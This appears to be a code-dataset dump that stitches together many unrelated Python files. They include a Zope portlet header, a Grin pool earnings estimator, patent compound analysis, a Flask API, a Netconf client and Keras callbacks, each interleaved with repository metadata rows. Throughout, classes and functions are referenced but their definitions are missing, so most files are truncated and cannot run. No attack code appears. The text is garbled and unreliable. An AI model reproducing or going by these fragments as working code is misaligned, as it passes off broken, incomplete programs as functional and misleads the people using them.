# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""
$Id$
"""
from zope import interface
from zope.location import LocationProxy
from zope.publisher.interfaces import NotFound
from zope.publisher.interfaces import IPublishTraverse
from zope.security.proxy import removeSecurityProxy
from zope.component import getAdapters, queryMultiAdapter
from zojax.statusmessage.interfaces import IStatusMessage
from zojax.portlet.interfaces import IPortletManager, IPortletsExtension
from zojax.portlet.browser.interfaces import IPortletManagerPublicMarker
| 33.982143 | 78 | 0.683132 |
b0d04d598a11b7e88dbf9f7dcbe48c016cf93d7f | 2,280 | py | Python | recsystem/embedder/post_embed.py | DOREMUS-ANR/recommender | 027e0dcb3639f03204c67777e2e10aac8505a70a | [
"MIT"
] | 2 | 2017-03-28T15:48:18.000Z | 2018-09-06T08:50:34.000Z | recsystem/embedder/post_embed.py | DOREMUS-ANR/recommender | 027e0dcb3639f03204c67777e2e10aac8505a70a | [
"MIT"
] | null | null | null | recsystem/embedder/post_embed.py | DOREMUS-ANR/recommender | 027e0dcb3639f03204c67777e2e10aac8505a70a | [
"MIT"
] | null | null | null | import os
import codecs
from shutil import copyfile
from gensim.models import KeyedVectors
from SPARQLWrapper import SPARQLWrapper, JSON
| 31.232877 | 117 | 0.658333 |
b0d08b7dcc6e66d8aad9485ee7da2eca8c60ae84 | 188 | py | Python | raster/__init__.py | manfre-lorson/MacPyver | 62503dae69705a25202f24615e0c7cc88e10d753 | [
"Apache-2.0"
] | 1 | 2021-11-03T01:49:47.000Z | 2021-11-03T01:49:47.000Z | raster/__init__.py | manfre-lorson/MacPyver | 62503dae69705a25202f24615e0c7cc88e10d753 | [
"Apache-2.0"
] | null | null | null | raster/__init__.py | manfre-lorson/MacPyver | 62503dae69705a25202f24615e0c7cc88e10d753 | [
"Apache-2.0"
] | 1 | 2018-07-11T09:23:45.000Z | 2018-07-11T09:23:45.000Z |
try:
from . import tiff
print("full tiff support")
except:
print("no tiff support")
try:
import hdf5
print("full hdf5 support")
except:
print("no hdf5 support")
| 13.428571 | 30 | 0.62766 |
b0d2ea6ce566b3bde93b03ec4fb9ce3e2422e739 | 6,292 | py | Python | clustering/track_visualization.py | XiaoSanGit/wda_tracker | b68ec0edb9daa6cc495815ba9ca549b36eec0369 | [
"MIT"
] | 24 | 2020-06-23T11:17:42.000Z | 2022-03-29T00:38:09.000Z | clustering/track_visualization.py | XiaoSanGit/wda_tracker | b68ec0edb9daa6cc495815ba9ca549b36eec0369 | [
"MIT"
] | 13 | 2020-07-07T03:59:02.000Z | 2022-03-30T04:28:06.000Z | clustering/track_visualization.py | XiaoSanGit/wda_tracker | b68ec0edb9daa6cc495815ba9ca549b36eec0369 | [
"MIT"
] | 9 | 2021-02-14T07:11:05.000Z | 2021-12-23T12:47:08.000Z |
import os
from tqdm import tqdm
import pandas as pd
from utilities.helper import get_bbox_middle_pos,drawBoundingBox
from clustering.clustering_utils import get_person_id_to_track,get_groundtruth_person_id_to_track
import cv2
from utilities.helper import *
from utilities.pandas_loader import load_csv
if __name__ == "__main__":
trv = Track_Visualization(dataset_base_folder="/home/philipp/Downloads/Recording_12.07.2019"
,track_results_path="/home/philipp/work_dirs/clustering/single_camera_refinement/track_results_2.txt"
,track_evaluation_results_path="/home/philipp/work_dirs/clustering/evaluation_per_track_results.csv"
,work_dirs="/home/philipp/work_dirs"
,cam_id=2)
trv = Track_Visualization(dataset_base_folder="/net/merkur/storage/deeplearning/users/koehl/gta/Recording_12.07.2019_17"
,
track_results_path="/home/koehlp/Downloads/work_dirs/clustering/single_camera_refinement/track_results_2.txt"
,
track_evaluation_results_path="/home/koehlp/Downloads/work_dirs/clustering/evaluation_per_track_results.csv"
, work_dirs="/home/koehlp/Downloads/work_dirs"
, cam_id=2
, output_folder="/net/merkur/storage/deeplearning/users/koehl/gta/drawn_tracks_matched")
trv.run_visualization()
| 33.827957 | 139 | 0.665607 |
b0d30d1f5e1fa7c7ff3fa8d3f5343770ef436fc7 | 445 | py | Python | Src/ZenCoding/zencoding/coda.py | JetBrains/ReSharperPowerToys | 352d61acba98d71b4c7a63a1def9fe550b7a0e57 | [
"Apache-2.0"
] | 18 | 2015-01-22T18:18:17.000Z | 2021-11-08T09:49:53.000Z | Src/ZenCoding/zencoding/coda.py | JetBrains/ReSharperPowerToys | 352d61acba98d71b4c7a63a1def9fe550b7a0e57 | [
"Apache-2.0"
] | null | null | null | Src/ZenCoding/zencoding/coda.py | JetBrains/ReSharperPowerToys | 352d61acba98d71b4c7a63a1def9fe550b7a0e57 | [
"Apache-2.0"
] | 8 | 2015-05-15T19:34:04.000Z | 2022-03-19T07:00:15.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Coda plug-in
Created on Apr 20, 2009
@author: sergey
'''
import os
from zencoding import zen_core
from zencoding.settings import zen_settings
zen_core.newline = os.getenv('CODA_LINE_ENDING', zen_core.newline)
zen_core.insertion_point = '$$IP$$'
cur_line = 'hello world div>p'
cur_index = 17
abbr = zen_core.find_abbr_in_line(cur_line, cur_index)
if abbr:
print(zen_core.expand_abbr(abbr))
| 19.347826 | 66 | 0.74382 |
b0d43b5a5e1054b6e91b5c04e0aefe730f1c03da | 958 | py | Python | Scripts/simulation/world/rentable_lot_tuning.py | velocist/TS4CheatsInfo | b59ea7e5f4bd01d3b3bd7603843d525a9c179867 | [
"Apache-2.0"
] | null | null | null | Scripts/simulation/world/rentable_lot_tuning.py | velocist/TS4CheatsInfo | b59ea7e5f4bd01d3b3bd7603843d525a9c179867 | [
"Apache-2.0"
] | null | null | null | Scripts/simulation/world/rentable_lot_tuning.py | velocist/TS4CheatsInfo | b59ea7e5f4bd01d3b3bd7603843d525a9c179867 | [
"Apache-2.0"
] | null | null | null | # uncompyle6 version 3.7.4
# Python bytecode 3.7 (3394)
# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]
# Embedded file name: T:\InGame\Gameplay\Scripts\Server\world\rentable_lot_tuning.py
# Compiled at: 2014-09-09 00:07:16
# Size of source mod 2**32: 925 bytes
from sims4.tuning.tunable import TunableTuple, Tunable
from sims4.tuning.tunable_base import ExportModes | 50.421053 | 116 | 0.685804 |
b0d58a0cf4141bba29b28d7f0ec53b0cea18f50b | 7,099 | py | Python | grin-py/utils/MWGP_earningsEstimate.py | JPaulMora/grin-pool | c980fdbcae4edeaa661d36d5b6da6f7a49beed05 | [
"Apache-2.0"
] | null | null | null | grin-py/utils/MWGP_earningsEstimate.py | JPaulMora/grin-pool | c980fdbcae4edeaa661d36d5b6da6f7a49beed05 | [
"Apache-2.0"
] | null | null | null | grin-py/utils/MWGP_earningsEstimate.py | JPaulMora/grin-pool | c980fdbcae4edeaa661d36d5b6da6f7a49beed05 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python3
# Copyright 2018 Blade M. Doyle
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------
###
# Estmate MWGrinPool earnings from historic data
# Input: --days, --c29gps, --c31gps
# Algorithm:
# Get a list of the blocks found by MWGrinPool within the requested block range
# For each pool-found-block:
# Calculate the theoritical rewards for a user with provided GPS
# Generate a graph
import os
import sys
import argparse
from datetime import datetime, timedelta
try:
import requests
except Exception as e:
print("Error: This script requires the 'requests' module, please run `pip3 install requests`")
Graph = True
try:
import plotly
import plotly.graph_objs as go
except Exception as e:
Graph = False
mwURL = "https://api.mwgrinpool.com"
NanoGrin = 1.0/1000000000.0
SecondsInDay = float(60*60*24)
PPLNGSeconds = float(60*60*4)
parser = argparse.ArgumentParser()
parser.add_argument("--days", help="Number of days to average over")
parser.add_argument("--c29gps", help="Miners C29 Graphs/second")
parser.add_argument("--c31gps", help="Miners C31 Graphs/second")
parser.add_argument("--debug", help="Print lots of debug info")
args = parser.parse_args()
print_header()
if args.days is None:
NumDays = float(input(" Number of days to average over: "))
else:
NumDays = float(args.days)
if NumDays > 62:
print(" ")
print(" -- Error: Please limit your query to 60 days to prevent excess load on our pool API")
print(" ")
sys.exit(1)
if args.c29gps is None:
C29Gps = float(input(" Miners C29 Graphs/second: "))
else:
C29Gps = float(args.c29gps)
if args.c31gps is None:
C31Gps = float(input(" Miners C31 Graphs/second: "))
else:
C31Gps = float(args.c31gps)
if args.debug is None:
debug = False
EndTS = datetime.now()
startTS = EndTS - timedelta(days=NumDays)
# Get a list of the pool-found-blocks within the range
poolblocksURL = mwURL + "/pool/blocks/0,1440/timestamp,height"
poolblocksJSON = requests.get(url = poolblocksURL).json()
poolblocks = [block['height'] for block in poolblocksJSON if(block['timestamp'] >= startTS.timestamp() and block['timestamp'] <= EndTS.timestamp())]
poolblocks.sort()
debug and print("Pool Blocks found in range: {}".format(poolblocks))
print(" ")
print(" Getting Mining Data: ")
rewardTotal = 0
x = [startTS]
y = [0]
debug and print("Start Time: {} - {}".format(startTS, startTS.timestamp()))
debug and print("End Time: {} - {}".format(EndTS, EndTS.timestamp()))
debug or sys.stdout.write(" ")
sys.stdout.flush()
for blockHeight in poolblocks:
# For each pool block, get some information:
# Secondary Scale Value
# Any TX fees included in the block reward
grinBlockURL = mwURL + "/grin/block/{}/timestamp,height,secondary_scaling,fee".format(blockHeight)
grinblockJSON = requests.get(url = grinBlockURL).json()
# Pool GPS at that block height
poolGpsURL = mwURL + "/pool/stat/{}/gps".format(blockHeight)
poolGpsJSON = requests.get(url = poolGpsURL).json()
# Calculate theoretical miners reward
scale = (2**(1+31-24)*31)/float(max(29, grinblockJSON['secondary_scaling']))
minerValue = C29Gps + C31Gps*scale
poolValue = 0
for gps in poolGpsJSON['gps']:
if gps['edge_bits'] == 29:
poolValue += gps['gps']
else:
poolValue += gps['gps']*scale
debug and print("Miner value: {}, pool value: {}".format(minerValue, poolValue))
fullMinersReward = (minerValue/poolValue)*(60+grinblockJSON['fee']*NanoGrin)
tsNow = datetime.fromtimestamp(grinblockJSON['timestamp'])
timedelta = tsNow - startTS
# Check if we get the full reward or not
if(timedelta.total_seconds() < PPLNGSeconds):
minersReward = fullMinersReward * (timedelta.total_seconds()/PPLNGSeconds)
else:
minersReward = fullMinersReward
debug and print(" + Miners reward for {} block {}: {}".format(datetime.fromtimestamp(grinblockJSON['timestamp']).strftime('%c'), blockHeight, minersReward))
rewardTotal += minersReward
# Graph
x.append(tsNow)
timedelta = tsNow - startTS
debug and print("timedelta = {}".format(timedelta))
daysSinceStartTS = float(timedelta.total_seconds())/float(SecondsInDay)
debug and print("daysSinceStartTS = {}".format(daysSinceStartTS))
y.append(rewardTotal/daysSinceStartTS)
debug and print(" ")
debug or sys.stdout.write(".")
sys.stdout.flush()
x.append(EndTS)
y.append(rewardTotal/NumDays)
print_footer(rewardTotal, C29Gps, C31Gps, NumDays, startTS, EndTS)
if Graph == True:
print("Generating graph...")
graphName = "Avg Daily Reward: {} Grin".format(round(rewardTotal/NumDays, 2))
graphData = [go.Scatter(x=x, y=y, name=graphName)]
graphLayout = go.Layout(
title=go.layout.Title(text=graphName),
xaxis=go.layout.XAxis(
title=go.layout.xaxis.Title(
text='Time',
font=dict(
family='Courier New, monospace',
size=18,
color='#008000'
)
)
),
yaxis=go.layout.YAxis(
title=go.layout.yaxis.Title(
text='Grin',
font=dict(
family='Courier New, monospace',
size=18,
color='#008000'
)
)
),
)
graphFigure = go.Figure(data=graphData, layout=graphLayout)
graph_name = "estimate-{}days.html".format(NumDays)
plotly.offline.plot(graphFigure, filename=graph_name)
| 35.318408 | 162 | 0.646993 |
b0d7ebc0b913cd1eef91933fd5bfa8848faaf124 | 10,700 | py | Python | cpd_analysis.py | jfmalloy1/Patents | 734e62497acfbd9be42980b310379979415ab924 | [
"MIT"
] | null | null | null | cpd_analysis.py | jfmalloy1/Patents | 734e62497acfbd9be42980b310379979415ab924 | [
"MIT"
] | null | null | null | cpd_analysis.py | jfmalloy1/Patents | 734e62497acfbd9be42980b310379979415ab924 | [
"MIT"
] | null | null | null | # import igraph as ig
# import numpy as np
import pickle
import pandas as pd
from tqdm import tqdm
import os
import heapq
import scipy.stats as stats
from random import sample
def build_cpd_df(fp):
""" Takes 29 separate compound data files and combines them into a single pandas dataframe for ease of access
Args:
fp (string): Filepath to SureChemBL data files (assuming G drive goes to jmalloy3 Google Account)
Returns:
None - but does write a pickled dataframe to SureChemBL_Patents/Cpd_Data/ directory
"""
dfs = []
for f in tqdm(os.listdir(fp)):
if f.endswith(".txt"):
dfs.append(pd.read_csv(fp + f, sep="\t", header=0))
df = pd.concat(dfs, ignore_index=True)
print(df)
pickle.dump(df, file=open(fp + "SureChemBL_allCpds.p", "wb"))
del df
def find_highest_degrees(df, n, start, stop):
""" Finds the n highest-degree compounds within a specific date range
Saves various data associated with those n comopunds - smiles, inchi,
inchikey, degree, preferential attachment value
Args:
df (pandas dataframe): dataframe containing all SureChemBL compounds
n (int): the number of highest-degree compounds to select
start (int): 1st year of the range
stop (int): last year of the range
"""
print("----------", start, stop, "----------")
#Finding the top 10 preferential attachment compounds (from 1980-1984 as a test)
full_id_degrees = pickle.load(file=open(
"G:\\Shared drives\\SureChemBL_Patents\\Degrees\\full_id_degrees_" +
str(start) + "_" + str(stop) + ".p", "rb"))
pref_attach_dict = pickle.load(file=open(
"G:\\Shared drives\\SureChemBL_Patents\\pref_attach_dict_" +
str(start) + "_" + str(stop) + ".p", "rb"))
#Find n compounds with largest degree
highest_degree_cpds = heapq.nlargest(n,
full_id_degrees,
key=full_id_degrees.get)
highest_degree_cpds_df = df[df["SureChEMBL_ID"].isin(highest_degree_cpds)]
pref_attach_values = list(pref_attach_dict.values())
#Extra information to be added to the csv output file
degrees = []
pref_attach_highestCpd_values = []
pref_attach_percentiles = []
for cpd in tqdm(highest_degree_cpds_df["SureChEMBL_ID"]):
#Degree of compound
degrees.append(full_id_degrees[cpd][-1])
#Preferential attachment value
pref_attach_highestCpd_values.append(pref_attach_dict[cpd])
#Percentile of preferential attachment value
pref_attach_percentiles.append(
stats.percentileofscore(pref_attach_values, pref_attach_dict[cpd]))
highest_degree_cpds_df["degree"] = degrees
highest_degree_cpds_df["pref_attach_value"] = pref_attach_highestCpd_values
highest_degree_cpds_df["pref_attach_percentile"] = pref_attach_percentiles
highest_degree_cpds_df.to_csv(
"G:\\Shared drives\\SureChemBL_Patents\\Cpd_Data/highest_degree_data_" +
str(start) + "_" + str(stop) + "_1000.csv")
print()
def find_llanos_cpds(fp, df):
""" Tests various compounds found in Llanos et al (2019) in SureChemBL data
Llanos et al used Reaxys data to find the most popular compounds. This checks
where those compounds appear, if at all, in SureChembL patent data
Args:
df (pandas dataframe): dataframe of all SureChemBL chemistry
"""
cpds_1980_2015_inchi = {
"acetic anhydride":
"InChI=1S/C4H6O3/c1-3(5)7-4(2)6/h1-2H3",
"methanol":
"InChI=1S/CH4O/c1-2/h2H,1H3",
"methyl iodide":
"InChI=1S/CH3I/c1-2/h1H3",
"diazomethane":
"InChI=1S/CH2N2/c1-3-2/h1H2",
"formaldehyde":
"InChI=1S/CH2O/c1-2/h1H2",
"benzaldehyde":
"InChI=1S/C7H6O/c8-6-7-4-2-1-3-5-7/h1-6H",
"copper(II) oxide":
"InChI=1S/Cu.O",
"ethanol":
"InChI=1S/C2H6O/c1-2-3/h3H,2H2,1H3",
"benzoyl chloride":
"InChI=1S/C7H5ClO/c8-7(9)6-4-2-1-3-5-6/h1-5H",
"carbon monoxide":
"InChI=1S/CO/c1-2",
"water (2000)":
"InChI=1S/H2O/h1H2",
"Trifluoroacetic acid (2000)":
"InChI=1S/C2HF3O2/c3-2(4,5)1(6)7/h(H,6,7)",
"Phenylacetylene (2000)":
"InChI=1S/C8H6/c1-2-8-6-4-3-5-7-8/h1,3-7H",
"benzyl bromide (2000)":
"InChI=1S/C7H7Br/c8-6-7-4-2-1-3-5-7/h1-5H,6H2"
}
#Find stats for Llanos compounds - use 2015 data for stats (I really need to make a consensus graph)
full_id_degrees = pickle.load(file=open(
"G:\\Shared drives\\SureChemBL_Patents\\Degrees\\full_id_degrees_2015_2019.p",
"rb"))
pref_attach_dict = pickle.load(file=open(
"G:\\Shared drives\\SureChemBL_Patents\\pref_attach_dict_2015_2019.p",
"rb"))
pref_attach_values = list(pref_attach_dict.values())
#Loop through Llanos compounds
with open(fp + "llanos_cpds.csv", "a") as f:
f.write(
"name,inchi,SureChemBL_ID,degree,pref_attach_value,pref_attach_percentile\n"
)
for name, inchi in cpds_1980_2015_inchi.items():
s = df[df["InChI"] == inchi]
if not s.empty: #if SureChemBL holds that compound, save id & stats
#Degree of compound
degree = full_id_degrees[s.iloc[0]["SureChEMBL_ID"]][-1]
#Preferential attachment value
pref_attach_value = pref_attach_dict[s.iloc[0]["SureChEMBL_ID"]]
#Percentile of preferential attachment value
pref_attach_percentile = stats.percentileofscore(
pref_attach_values,
pref_attach_dict[s.iloc[0]["SureChEMBL_ID"]])
f.write(name + ",\"" + inchi + "\"," +
s.iloc[0]["SureChEMBL_ID"] + "," + str(degree) + "," +
str(pref_attach_value) + "," +
str(pref_attach_percentile) + "\n")
else: #if not, no name nor stats
f.write(name + ",\"" + inchi + "\",na,na,na,na\n")
def build_month_increments(start, stop):
""" Build all monthly increments from the start year to stop year in the
format YEAR-MONTH
Args:
start (int): start year of increments
stop (int): end year of increments
Returns:
list: list of strings holding the YEAR-MONTH increments
"""
months = []
while start <= stop:
for month in [
"01", "02", "03", "04", "05", "06", "07", "08", "09", "10",
"11", "12"
]:
months.append(str(start) + "-" + month)
start += 1
return months
def sample_compounds_unique(n, months, cpds, cpd_df):
""" Sample compounds which are uniquely added in a specific month
This uniquess is determined by determing when a compound is added in a month
and has not been present in the patent record before that month.
Args:
n (int): Number of compounds to sample every month
months (list): list of months to sample from
cpds (list): all SureChemBL IDs of compounds added in a specific month
cpd_df (pandas dataframe): Master dataframe of all compounds
"""
sample_inchis = {}
print("----- Sampling unique compounds -----")
for i in tqdm(range(len(months))):
offset = 216 #Account for starting in 1980 instead of 1962
#Only sample if there are more than 1000 compounds
if len(cpds[i+offset]) > n:
sample_cpds = sample(cpds[i+offset], n)
else:
sample_cpds = cpds[i+offset]
sub_df = cpd_df[cpd_df["SureChEMBL_ID"].isin(sample_cpds)]
sample_inchis[months[i]] = list(sub_df["InChI"])
print("\n----- Saving compounds -----")
pickle.dump(sample_inchis, file=open("Data/sample_inchi_1000_NEW.p", "wb"))
def sample_compounds(n1, n2, months, cpd_df):
""" Sample n compounds from each month, initially with overlap allowed
//TODO: fix so that only unique-to-that-month compounds are sampled
Args:
n (int): number of compounds to sample
n2 (int): another number of compounds to sample
months (string): description of month, e.g. 1980-01
cpd_df (pandas dataframe): contains information for each compound in SureChemBL, including InChIKey
Returns:
list: list of all randomly sampled compounds (in inchi?)
"""
#Inchis for all sampled compounds
sample_inchis_n1 = {}
sample_inchis_n2 = {}
print("----- Sampling Compounds ------\n")
for month in tqdm(months):
cpds = pickle.load(file=open(
"G:\\Shared drives\\SureChemBL_Patents\\CpdPatentIdsDates\\unique_cpds_"
+ month + ".p", "rb"))
sample_cpds_n1 = sample(cpds, n1)
sample_cpds_n2 = sample(cpds, n2)
sub_df = cpd_df[cpd_df["SureChEMBL_ID"].isin(sample_cpds_n1)]
sample_inchis_n1[month] = list(sub_df["InChI"])
sub_df = cpd_df[cpd_df["SureChEMBL_ID"].isin(sample_cpds_n2)]
sample_inchis_n2[month] = list(sub_df["InChI"])
#Save memory by removing cpd datframe and monthly compounds
del (cpd_df)
del (cpds)
#Save sampled inchis to pickle files
print("\n----- Saving Data -----")
pickle.dump(sample_inchis_n1, file=open("Data/sample_inchi_100.p", "wb"))
pickle.dump(sample_inchis_n2, file=open("Data/sample_inchi_1000.p", "wb"))
if __name__ == "__main__":
main()
| 36.148649 | 113 | 0.622056 |
b0d95d877dbc18f3a49976b9ba5deae89d43a171 | 350 | py | Python | finished/python_principles/05_type_check.py | UltiRequiem/daily-python-practice | 31f72c45378be90b8fcadd30d7042819ee551a17 | [
"MIT"
] | 8 | 2021-05-29T23:30:12.000Z | 2021-09-24T03:25:44.000Z | finished/python_principles/05_type_check.py | UltiRequiem/daily-python-practice | 31f72c45378be90b8fcadd30d7042819ee551a17 | [
"MIT"
] | null | null | null | finished/python_principles/05_type_check.py | UltiRequiem/daily-python-practice | 31f72c45378be90b8fcadd30d7042819ee551a17 | [
"MIT"
] | 6 | 2021-06-02T14:20:24.000Z | 2021-08-19T00:49:26.000Z | """
Your function should return True if both parameters are integers, and False otherwise.
"""
if __name__ == "__main__":
tests()
| 18.421053 | 86 | 0.62 |
b0da89a6bb254fa22755c06a1a618c46fe33ed81 | 3,775 | py | Python | media/limited_series.py | FellowHashbrown/MediaQueue | 0844649709698c66b7ed14e70436b3830ab18627 | [
"MIT"
] | null | null | null | media/limited_series.py | FellowHashbrown/MediaQueue | 0844649709698c66b7ed14e70436b3830ab18627 | [
"MIT"
] | null | null | null | media/limited_series.py | FellowHashbrown/MediaQueue | 0844649709698c66b7ed14e70436b3830ab18627 | [
"MIT"
] | null | null | null | import os
from json import dump
from typing import List
from media import Episode, Show
from options import options
| 45.481928 | 125 | 0.625166 |
b0daa63a5af9ec548e408e77f43dd85ab4843906 | 462 | py | Python | __findModuleLocations.py | simdevex/01.Basics | cf4f372384e66f4b26e4887d2f5d815a1f8e929c | [
"MIT"
] | null | null | null | __findModuleLocations.py | simdevex/01.Basics | cf4f372384e66f4b26e4887d2f5d815a1f8e929c | [
"MIT"
] | null | null | null | __findModuleLocations.py | simdevex/01.Basics | cf4f372384e66f4b26e4887d2f5d815a1f8e929c | [
"MIT"
] | null | null | null | '''
Python program to find the location of Python modulesources
'''
#Location of Python module sources:
import imp
print("Location of Python os module sources:")
print(imp.find_module('os'))
print("\nLocation of Python sys module sources:")
print(imp.find_module('datetime'))
#List of directories of specific module:
import os
print("\nList of directories in os module:")
print(os.path)
print("\nList of directories in sys module:")
import sys
print(sys.path)
| 24.315789 | 59 | 0.75974 |
b0dc67e2fb068fd1e2da407f360e7696247d97ff | 8,104 | py | Python | api.py | gitroulette/gitroulette | 0c53cdf843b202efa7d0e7a3fcbcb0a7bc7f0b0b | [
"Apache-2.0"
] | null | null | null | api.py | gitroulette/gitroulette | 0c53cdf843b202efa7d0e7a3fcbcb0a7bc7f0b0b | [
"Apache-2.0"
] | null | null | null | api.py | gitroulette/gitroulette | 0c53cdf843b202efa7d0e7a3fcbcb0a7bc7f0b0b | [
"Apache-2.0"
] | null | null | null | import json
import random
from flask import Blueprint
from flask import request
from flask import session
from sqlalchemy import and_
from sqlalchemy import or_
from urlparse import urlparse
# from flask import current_app
from gitRoulette import auth
from gitRoulette import models
from gitRoulette.utils import request_utils
api = Blueprint('api', __name__)
db = models.db
| 32.15873 | 101 | 0.659057 |
b0ddf344239a48edf5e77538da1c1fa89461c624 | 1,556 | py | Python | translator/logger.py | dNationCloud/jsonnet-translator | 94d9d1b56d21a357fcab8adc555aa4630234d19c | [
"Apache-2.0"
] | 7 | 2021-04-14T11:30:03.000Z | 2021-05-17T11:26:50.000Z | translator/logger.py | dNationCloud/jsonnet-translator | 94d9d1b56d21a357fcab8adc555aa4630234d19c | [
"Apache-2.0"
] | 10 | 2021-01-14T07:18:55.000Z | 2021-10-01T12:56:39.000Z | translator/logger.py | dNationCloud/kubernetes-jsonnet-translator | 94d9d1b56d21a357fcab8adc555aa4630234d19c | [
"Apache-2.0"
] | null | null | null | #
# Copyright 2020 The dNation Jsonnet Translator Authors. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
import logging.handlers
import sys
from pythonjsonlogger import jsonlogger
LOGGER_NAME = "translator"
LOG_FORMAT = "%(asctime)s - [%(levelname)-5s] - %(message)s"
FORMATTER = {
"default": logging.Formatter(LOG_FORMAT),
"json": jsonlogger.JsonFormatter(LOG_FORMAT),
}
def set_logger(level, format):
"""Sets the threshold for the logger to defined level and format
Args:
level (str): Logger threshold.
format (str): Logger format.
Return:
None
"""
formatter = FORMATTER[format]
logger = logging.getLogger(LOGGER_NAME)
logger.setLevel(level)
logger.addHandler(get_console_handler(formatter))
logger.propagate = False
| 27.785714 | 77 | 0.737147 |
b0de787d9d796dd2d84865af0e45d3952304b306 | 5,663 | py | Python | models/test2/scripts/lmdb_data.py | Mehuli-Ruh11/Flownet_v1 | 17d517416a24f396a21e36e35e73abeb857451d2 | [
"BSD-2-Clause"
] | 130 | 2016-10-28T18:37:14.000Z | 2022-03-29T03:24:31.000Z | models/test2/scripts/lmdb_data.py | Mehuli-Ruh11/Flownet_v1 | 17d517416a24f396a21e36e35e73abeb857451d2 | [
"BSD-2-Clause"
] | 34 | 2016-09-30T14:35:11.000Z | 2019-01-06T12:02:17.000Z | models/test2/scripts/lmdb_data.py | Mehuli-Ruh11/Flownet_v1 | 17d517416a24f396a21e36e35e73abeb857451d2 | [
"BSD-2-Clause"
] | 73 | 2016-06-24T10:51:51.000Z | 2020-12-22T11:21:40.000Z | import numpy as np
import caffe
import flowlib as fl
import os
import lmdb
from PIL import Image
VERBOSE = 0
SUBPIXELFACTOR = 4
MIN_FLOW = -4.18505
THRESHOLD = 1e8
PATCH_SIZE = 'FULL'
def read_lmdb(database_file):
"""
Read lmdb data
return content and shape
"""
db = lmdb.open(database_file, readonly=True)
with db.begin() as txn:
raw_data = txn.get(b'00000000') # get the first key value
datum = caffe.proto.caffe_pb2.Datum()
datum.ParseFromString(raw_data)
# convert string type data to actual data
# content now is a Nx1 array
content = np.fromstring(datum.data, dtype=np.uint8)
shape = [datum.channels, datum.height, datum.width]
return content, shape
| 27.357488 | 80 | 0.707046 |
b0df7d5ad0499addaf0ae1570bc27728fffba61b | 778 | py | Python | configs/_base_/det_datasets/pool_icdar2013_icdar2015.py | andrgje/mmocr | 26963dcf56b6cc842d097617a9dc1688b01fcaed | [
"Apache-2.0"
] | null | null | null | configs/_base_/det_datasets/pool_icdar2013_icdar2015.py | andrgje/mmocr | 26963dcf56b6cc842d097617a9dc1688b01fcaed | [
"Apache-2.0"
] | null | null | null | configs/_base_/det_datasets/pool_icdar2013_icdar2015.py | andrgje/mmocr | 26963dcf56b6cc842d097617a9dc1688b01fcaed | [
"Apache-2.0"
] | null | null | null | dataset_type1 = 'IcdarDataset'
data_root1 = 'data/icdar15'
train1 = dict(
type=dataset_type1,
ann_file=f'{data_root1}/instances_training.json',
img_prefix=f'{data_root1}/imgs',
pipeline=None)
test1 = dict(
type=dataset_type1,
ann_file=f'{data_root1}/instances_validation.json',
img_prefix=f'{data_root1}/imgs',
pipeline=None)
dataset_type2 = 'IcdarDataset'
data_root2 = 'data/icdar13'
train2 = dict(
type=dataset_type2,
ann_file=f'{data_root2}/instances_training.json',
img_prefix=f'{data_root2}/imgs',
pipeline=None)
test2 = dict(
type=dataset_type2,
ann_file=f'{data_root2}/instances_validation.json',
img_prefix=f'{data_root2}/imgs',
pipeline=None)
train_list = [train1,train2]
test_list = [test1,test2]
| 22.882353 | 55 | 0.713368 |
b0e1dfb1774454a45bec65b7f4f0e603d7f1da9e | 13,580 | py | Python | lib/Protocol/EmNetconfProtocol.py | multi-service-fabric/element-manager | e550d1b5ec9419f1fb3eb6e058ce46b57c92ee2f | [
"Apache-2.0"
] | null | null | null | lib/Protocol/EmNetconfProtocol.py | multi-service-fabric/element-manager | e550d1b5ec9419f1fb3eb6e058ce46b57c92ee2f | [
"Apache-2.0"
] | null | null | null | lib/Protocol/EmNetconfProtocol.py | multi-service-fabric/element-manager | e550d1b5ec9419f1fb3eb6e058ce46b57c92ee2f | [
"Apache-2.0"
] | 1 | 2020-04-02T01:17:43.000Z | 2020-04-02T01:17:43.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright(c) 2019 Nippon Telegraph and Telephone Corporation
# Filename: EmNetconfProtocol.py
'''
Protocol processing section (Netconf)
'''
import traceback
import time
import json
from ncclient import manager
from ncclient import operations
import GlobalModule
import EmNetconfClient
from EmCommonLog import decorater_log
from EmCommonLog import decorater_log_in_out
| 37.513812 | 80 | 0.546318 |
b0e21640f79315d5678d2b1eb1562ded16d33050 | 1,935 | py | Python | policy/openbot/callbacks.py | januxnet/OpenBot | 04768161a552281e1e14acde98589a64628b86c7 | [
"MIT"
] | 1,971 | 2020-08-24T22:24:24.000Z | 2021-07-24T18:43:39.000Z | policy/openbot/callbacks.py | FlorentGuinier/OpenBot | 087b1c89fd61ee5e644a0b042c9e5f25540caeae | [
"MIT"
] | 145 | 2020-08-26T23:00:28.000Z | 2021-07-26T22:00:06.000Z | policy/openbot/callbacks.py | FlorentGuinier/OpenBot | 087b1c89fd61ee5e644a0b042c9e5f25540caeae | [
"MIT"
] | 342 | 2020-08-26T10:39:43.000Z | 2021-07-26T12:12:10.000Z | # Created by Matthias Mueller - Intel Intelligent Systems Lab - 2020
import os
import tensorflow as tf
# This function defines a custom learning schedule.
| 26.148649 | 88 | 0.67907 |
